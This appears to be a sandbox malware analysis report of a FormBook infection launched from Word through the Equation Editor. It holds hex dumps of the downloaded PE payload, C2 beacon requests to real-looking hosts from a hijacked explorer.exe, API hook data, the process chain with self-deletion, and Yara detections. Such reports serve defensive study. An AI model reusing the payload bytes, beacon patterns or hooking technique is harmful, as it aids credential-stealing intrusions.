                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e4 d6 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 d0 01 00 00 04 00 00 61 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 84 00 00 a0 00 00 00 00 d0 02 00 c8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3c 62 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 74 12 00 00 00 80 00 00 00 14 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 a8 01 00 00 a0 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 0b 00 00 00 d0 02 00 00 0c 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 48 47 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 64 82 40 00 e9 42 01 00 00 53 56 8b 35 54 47 42 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1)PGPGPG*_PGPFIPG*_PGswPG.VAPGRichPGPEL$_da4@@8.text<bd `.rdatath@@.dataX|@.ndataP.rsrc@@U\}t+}FEuHHGBHPuuud@BSV5TGB
                                                            May 4, 2021 05:37:00.738993883 CEST3INData Raw: 8d 45 a4 57 50 ff 75 08 ff 15 5c 82 40 00 83 65 f4 00 89 45 0c 8d 45 e4 50 ff 75 08 ff 15 6c 82 40 00 8b 7d f0 83 65 f0 00 8b 1d 60 80 40 00 e9 80 00 00 00 0f b6 46 52 0f b6 56 56 0f af 55 e8 8b cf 2b 4d e8 0f af c1 03 c2 89 4d 10 99 f7 ff 33 d2
                                                            Data Ascii: EWPu\@eEEPul@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu@uE9}w~Xtev4X@EtU}jWEEL@vXW
                                                            May 4, 2021 05:37:00.739018917 CEST4INData Raw: 40 00 3b cb 74 07 52 51 ff d6 8b 45 d8 8b 0d 24 3f 42 00 3b cb 0f 84 c6 14 00 00 50 51 ff d6 e9 bd 14 00 00 6a f0 e8 2a 16 00 00 ff 75 dc 50 ff 15 fc 80 40 00 85 c0 0f 85 a4 14 00 00 e9 04 12 00 00 6a f0 e8 0c 16 00 00 8b f8 57 e8 8f 46 00 00 8b
                                                            Data Ascii: @;tRQE$?B;PQj*uP@jWF;tTj\VF:Eu9]tBtWBWB;t=uW@uEEF:u9]t)jWhBKW@EjSoP7Oj
                                                            May 4, 2021 05:37:00.739044905 CEST6INData Raw: 00 59 89 55 c8 59 8b c8 8b 45 e4 83 f8 0d 0f 87 94 00 00 00 ff 24 85 74 2b 40 00 03 f9 e9 5a 03 00 00 2b f9 e9 53 03 00 00 0f af cf eb 1a 3b cb 74 53 8b c7 99 f7 f9 8b f8 e9 3e 03 00 00 0b cf eb 06 23 cf eb 02 33 cf 8b f9 e9 2d 03 00 00 33 c0 3b
                                                            Data Ascii: YUYE$t+@Z+S;tS>#3-3;;u3;t;t3G;t3E}jdj9PWVU4@E=`@;tDH;?;u;
                                                            May 4, 2021 05:37:00.739072084 CEST7INData Raw: e9 77 f5 ff ff 88 1e 88 1f e9 c4 07 00 00 6a ee e8 cc 0b 00 00 8d 4d c8 89 45 cc 51 50 6a 0a e8 20 46 00 00 ff d0 88 1e 3b c3 89 45 f4 88 1f c7 45 fc 01 00 00 00 0f 84 31 0a 00 00 50 6a 40 ff 15 28 81 40 00 3b c3 89 45 08 0f 84 1d 0a 00 00 6a 0b
                                                            Data Ascii: wjMEQPj F;EE1Pj@(@;EjEjEEuEuSuUt2EPEPh@uUtEpVAEpW@]uZ9HBEjj9]EtVT@;ujSV0@
                                                            May 4, 2021 05:37:00.739099026 CEST8INData Raw: 00 00 3b fb 88 1e 0f 84 8c 02 00 00 8d 4d c8 c7 45 c8 00 04 00 00 51 8d 4d 08 56 51 53 50 57 ff 15 08 80 40 00 33 c9 41 85 c0 75 2e 83 7d 08 04 74 13 39 4d 08 74 06 83 7d 08 02 75 1d 8b 45 e8 89 45 fc eb 72 ff 36 33 c0 39 5d e8 56 0f 94 c0 89 45
                                                            Data Ascii: ;MEQMVQSPW@3Au.}t9Mt}uEEr639]VE<cM\h|j;YU9]MtQVPW@SSSMSQVPW0@tEW@jV;;\PjuuP7
                                                            May 4, 2021 05:37:00.739124060 CEST10INData Raw: 42 00 33 c0 5f 5e 5b c9 c2 04 00 65 2a 40 00 90 14 40 00 9c 14 40 00 b7 14 40 00 ca 14 40 00 d6 14 40 00 f4 14 40 00 6f 15 40 00 9d 15 40 00 bb 15 40 00 59 16 40 00 02 15 40 00 41 15 40 00 62 15 40 00 6a 16 40 00 bb 16 40 00 1f 17 40 00 46 17 40
                                                            Data Ascii: B3_^[e*@@@@@@@o@@@Y@@A@b@j@@@F@Y@@@2@G@Y@@@^@@c@@.@.@@@D@e@5@@@{@@@ @k!@"@m#@#@#@!$@v$@%@%@%@&@&&@m&@*'@]'@
                                                            May 4, 2021 05:37:00.739147902 CEST11INData Raw: 72 02 8b f8 57 53 e8 5d 04 00 00 85 c0 0f 84 51 01 00 00 83 3d 58 47 42 00 00 75 7a 6a 1c 8d 45 dc 53 50 e8 b9 2d 00 00 8b 45 dc a9 f0 ff ff ff 75 72 81 7d e0 ef be ad de 75 69 81 7d ec 49 6e 73 74 75 60 81 7d e8 73 6f 66 74 75 57 81 7d e4 4e 75
                                                            Data Ascii: rWS]Q=XGBuzjESP-Eur}ui}Instu`}softuW}NulluNEEAHBE;XGB,EuEu?Ep;vEujY;5AsWSu6E=A+"3j9XGBY9]t*5AEjP
                                                            May 4, 2021 05:37:00.739172935 CEST13INData Raw: 09 e8 56 31 00 00 6a 07 a3 44 47 42 00 e8 4a 31 00 00 3b c3 74 0f 6a 1e ff d0 85 c0 74 07 80 0d 4f 47 42 00 40 55 ff 15 38 80 40 00 53 ff 15 88 82 40 00 a3 18 48 42 00 53 8d 44 24 38 68 60 01 00 00 50 53 68 10 fd 41 00 ff 15 6c 81 40 00 68 ec a1
                                                            Data Ascii: V1jDGBJ1;tjtOGB@U8@S@HBSD$8h`PShAl@h@h@?B,@BPU,=B"@GB@uD$"Bt$P}&P@D$ u@8 t8"D$ u@D$"8/@8SuH t:uHB@
                                                            May 4, 2021 05:37:00.739197969 CEST14INData Raw: ff 15 28 81 40 00 85 c0 74 1b 8b 4c 24 0c 89 70 08 89 48 04 8b 0d 14 fd 41 00 89 08 a3 14 fd 41 00 33 c0 eb 03 83 c8 ff 5e c2 08 00 83 ec 10 53 55 56 8b 35 54 47 42 00 57 6a 02 e8 e2 2b 00 00 33 db 3b c3 74 12 ff d0 0f b7 c0 50 68 00 b0 42 00 e8
                                                            Data Ascii: (@tL$pHAA3^SUV5TGBWj+3;tPhB!'TPBSWShL@hB0BxB}&8PBuSWhj@h$@h_&WhB'@\GBB UGBGB!NH;tzVLGB6BSW
                                                            May 4, 2021 05:37:00.788916111 CEST16INData Raw: 42 00 ff d6 6a 02 57 a3 4c 0d 42 00 ff d6 6a ff 6a 1c 57 a3 18 fd 41 00 e8 46 03 00 00 ff 35 28 3f 42 00 6a f2 57 ff 15 d8 81 40 00 6a 04 e8 8f d4 ff ff a3 0c 3f 42 00 33 c0 40 a3 38 0d 42 00 8b 0d f8 a1 40 00 33 ed 8b f1 c1 e6 06 03 35 80 47 42
                                                            Data Ascii: BjWLBjjWAF5(?BjW@j?B3@8B@35GB;|>u1Uvt$jUh5?B`@39-?B9.h8B@@;GBuj9-?BGB9@v$^hB"v


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.2249168154.86.42.25280C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            May 4, 2021 05:38:02.831583023 CEST247OUTGET /xcl/?ZVeHz=RmzwS/19amak9riNwxnkKWY/GrwQkk+Z9h+s+sO794NmAWuM+4hewKU4PkGr68hD/xJogQ==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1
                                                            Host: www.devarajantraders.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            May 4, 2021 05:38:03.327630997 CEST249INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 04 May 2021 03:38:03 GMT
                                                            Content-Type: ;charset=utf-8
                                                            Content-Length: 926
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=c8k4tslfuof2dmdheu81oapt5i; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            Data Raw: 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e e5 8f 8b e6 83 85 e9 93 be e6 8e a5 ef bc 9a 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 62 6f 6f 73 74 65 72 66 69 67 68 74 67 65 61 72 75 73 61 2e 63 6f 6d 2f 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e e4 ba 9a e5 8d 9a 41 70 70 3c 2f 61 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 63 6c 69 6e 69 63 61 64 65 6e 74 61 6c 74 65 63 70 72 6f 64 65 6e 74 2e 63 6f 6d 2f 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e e4 ba 9a e5 8d 9a 41 70 70 e6 89 8b e6 9c ba e7 89 88 3c 2f 61 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 62 72 6f 61 64 75 73 2d 6d 6f 6e 74 61 6e 61 2e 63 6f 6d 2f 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e e4 ba 9a e5 8d 9a 41 70 70 3c 2f 61 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 6f 6d 65 6e 61 64 65 74 6f 75 72 73 2e 63 6f 6d 2f 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e e7 a6 81 e6 ad a2 31 38 e5 b2 81 31 30 30 30 e9 83 a8 e6 8b 8d e6 8b 8d e6 8b 8d 3c 2f 61 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 65 63 61 72 72 69 61 67 65 73 2e 63 6f 6d 2f 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e e4 ba 9a e5 8d 9a 41 50 50 3c 2f 61 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 67 61 73 73 68 75 6b 75 6d 65 6e 6b 79 6f 2d 67 75 69 64 65 2e 63 6f 6d 2f 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e e4 ba 9a e5 8d 9a 61 70 70 e4 b8 8b e8 bd bd e5 9c b0 e6 96 b9 3c 2f 61 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 63 68 61 72 6c 65 73 6d 63 63 6c 65 6c 6c 61 6e 66 75 6e 65 72 61 6c 68 6f 6d 65 2e 63 6f 6d 2f 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e e4 ba 9a e5 8d 9a 41 50 50 3c 2f 61 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 6d 79 65 6e 67 72 61 76 65 64 6d 65 6d 6f 72 69 65 73 2e 63 6f 6d 2f 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e e9 a6 96 e9 a1 b5 3c 2f 61 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 62 69 61 6f 70 69 6e 70 61 69 2e 63 6f 6d 2f 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e e4 ba 9a e5 8d 9a 41 50 50 e6 89 8b e6 9c ba e7 89 88 3c 2f 61 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 72 6f 79 61 6c 34 67 69 66 74 73 2e 63 6f 6d 2f 27 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 3e e5 90 91 e6 97 a5 e8 91 b5 e5 85 8d e8 b4 b9 e5 9c a8 e7 ba bf e8 a7 82 e7 9c 8b 3c 2f 61 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 3c 2f 64 69 76 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <div align="center"><a href='http://boosterfightgearusa.com/' target='_blank'>App</a>&nbsp;&nbsp;<a href='http://clinicadentaltecprodent.com/' target='_blank'>App</a>&nbsp;&nbsp;<a href='http://broadus-montana.com/' target='_blank'>App</a>&nbsp;&nbsp;<a href='http://www.promenadetours.com/' target='_blank'>181000</a>&nbsp;&nbsp;<a href='http://www.ecarriages.com/' target='_blank'>APP</a>&nbsp;&nbsp;<a href='http://gasshukumenkyo-guide.com/' target='_blank'>app</a>&nbsp;&nbsp;<a href='http://charlesmcclellanfuneralhome.com/' target='_blank'>APP</a>&nbsp;&nbsp;<a href='http://myengravedmemories.com/' target='_blank'></a>&nbsp;&nbsp;<a href='http://biaopinpai.com/' target='_blank'>APP</a>&nbsp;&nbsp;<a href='http://royal4gifts.com/' target='_blank'></a>&nbsp;&nbsp;</div></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.2249169172.217.18.11580C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            May 4, 2021 05:38:53.736740112 CEST250OUTGET /xcl/?ZVeHz=BgLP7+VyAbe+irQ8z0wpLO49yx16Kwx4jjQ33/W3X+9zq2VbrBj/CRN5ENeCInervJ/P3w==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1
                                                            Host: www.photograph-gallery.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            May 4, 2021 05:38:53.882611036 CEST250INHTTP/1.1 301 Moved Permanently
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Tue, 04 May 2021 03:38:53 GMT
                                                            Location: https://www.photograph-gallery.com/xcl/?ZVeHz=BgLP7+VyAbe+irQ8z0wpLO49yx16Kwx4jjQ33/W3X+9zq2VbrBj/CRN5ENeCInervJ/P3w%3D%3D&-ZAh4=mxo8s0M0KXs4hlP0
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Connection: close


                                                            Code Manipulations

                                                            User Modules

                                                            Hook Summary

                                                            Function NameHook TypeActive in Processes
                                                            PeekMessageAINLINEexplorer.exe
                                                            PeekMessageWINLINEexplorer.exe
                                                            GetMessageWINLINEexplorer.exe
                                                            GetMessageAINLINEexplorer.exe

                                                            Processes

                                                            Process: explorer.exe, Module: USER32.dll
                                                            Function NameHook TypeNew Data
                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE2
                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE2
                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE2
                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE2

                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            Analysis Process: WINWORD.EXE PID: 1084 Parent PID: 584

                                                            General

                                                            Start time:05:36:35
                                                            Start date:04/05/2021
                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                            Imagebase:0x13ffc0000
                                                            File size:1424032 bytes
                                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: EQNEDT32.EXE PID: 2688 Parent PID: 584

                                                            General

                                                            Start time:05:36:36
                                                            Start date:04/05/2021
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                            Imagebase:0x400000
                                                            File size:543304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: propser16364.exe PID: 2960 Parent PID: 2688

                                                            General

                                                            Start time:05:36:37
                                                            Start date:04/05/2021
                                                            Path:C:\Users\user\AppData\Roaming\propser16364.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\propser16364.exe
                                                            Imagebase:0x400000
                                                            File size:233896 bytes
                                                            MD5 hash:AA6168D4E41CED2091BAEE9F5D59E11E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 12%, Metadefender, Browse
                                                            • Detection: 66%, ReversingLabs
                                                            Reputation:low

                                                            Chronological Activities

                                                            Analysis Process: propser16364.exe PID: 2860 Parent PID: 2960

                                                            General

                                                            Start time:05:36:38
                                                            Start date:04/05/2021
                                                            Path:C:\Users\user\AppData\Roaming\propser16364.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\propser16364.exe
                                                            Imagebase:0x400000
                                                            File size:233896 bytes
                                                            MD5 hash:AA6168D4E41CED2091BAEE9F5D59E11E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            Chronological Activities

                                                            Analysis Process: explorer.exe PID: 1388 Parent PID: 2860

                                                            General

                                                            Start time:05:36:42
                                                            Start date:04/05/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:
                                                            Imagebase:0xffca0000
                                                            File size:3229696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: NAPSTAT.EXE PID: 2532 Parent PID: 1388

                                                            General

                                                            Start time:05:36:53
                                                            Start date:04/05/2021
                                                            Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                            Imagebase:0xde0000
                                                            File size:279552 bytes
                                                            MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            Chronological Activities

                                                            Analysis Process: EQNEDT32.EXE PID: 2488 Parent PID: 584

                                                            General

                                                            Start time:05:36:56
                                                            Start date:04/05/2021
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                            Imagebase:0x400000
                                                            File size:543304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Analysis Process: cmd.exe PID: 2856 Parent PID: 2532

                                                            General

                                                            Start time:05:36:57
                                                            Start date:04/05/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del 'C:\Users\user\AppData\Roaming\propser16364.exe'
                                                            Imagebase:0x4a3f0000
                                                            File size:302592 bytes
                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Chronological Activities

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >

                                                              Analysis Process: propser16364.exe PID: 2960 Parent PID: 2688 propser16364.exeCOMMON

                                                              Executed Functions

                                                              Function 00403461, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 86%
                                                              			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
